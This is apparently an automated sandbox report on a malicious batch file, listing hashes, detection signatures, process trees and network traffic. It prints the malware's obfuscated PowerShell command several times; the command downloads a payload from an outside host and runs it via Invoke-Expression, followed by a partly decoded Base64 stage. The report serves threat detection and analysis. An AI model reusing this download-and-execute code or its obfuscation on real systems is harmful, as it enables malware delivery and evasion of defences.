Windows Analysis Report
malicious.bat

Overview

General Information

Sample name: malicious.bat
Analysis ID: 1670572
MD5: 693f86f667d508d9b9f3b8a00cdd1bb3
SHA1: 127ab3dc1f6830d309db566178b36ccf05d46c6f
SHA256: 59161a726bdcbab80697f632c77780d432cdaf0333eb9574172fd71a12a1c64e

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious PowerShell Parameter Substring
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious]
  • System is w10x64native
  • cmd.exe (PID: 2900 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 4296 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e 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
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e 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
No Suricata rule has matched

AV Detection

Source: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt, Avira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.fun, Avira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca, Avira URL Cloud: Label: malware
Source: https://qqcxq1.dyheg.fun/7721, Avira URL Cloud: Label: malware
Source: Submitted Sample, Neural Call Log Analysis: 88.2%
Source: unknown, HTTPS traffic detected: 172.67.212.124:443 -> 192.168.11.20:49747 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.65018244073.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbR|2l|2 ^|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C36000.00000004.00000020.00020000.00000000.sdmp
Source: global traffic, HTTP traffic detected:
  GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt HTTP/1.1
  Host: qqcxq1.dyheg.fun
  Connection: Keep-Alive
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: qqcxq1.dyheg.fun
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 21 Apr 2025 19:59:40 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 193
  Connection: close
  X-Powered-By: Express
  Content-Security-Policy: default-src 'none'
  X-Content-Type-Options: nosniff
  Cf-Cache-Status: DYNAMIC
  Server: cloudflare
  Set-Cookie: connect.sid=s%3AAvjgGrOay8d4iXYwUutebVYKUNI1fQVA.sjFiGZhpzt5Xj0xJqWxuSMo3dzAabzbphFz8KylaUPM; HttpOnly; Path=/
  CF-RAY: 933f76977c2d438d-EWR
  alt-svc: h3=":443"; ma=86400
Source: unknown, Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 4_2_00007FFC39152A1D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 5_2_06BA1D00
Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 27109
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: Commandline size = 27092
Source: classification engine, Classification label: mal60.evad.winBAT@9/10@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Documents\20250421
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gbqddpw.cai.ps1
Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.65018244073.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbR|2l|2 ^|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.64974512754.0000000002C25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.64974512754.0000000002C36000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076B3A9D push eax; retf 5_2_076B3AB1
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9893
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9900
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep count: 9942 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680 Thread sleep count: 9893 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000005.00000002.65025060540.00000000087DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)
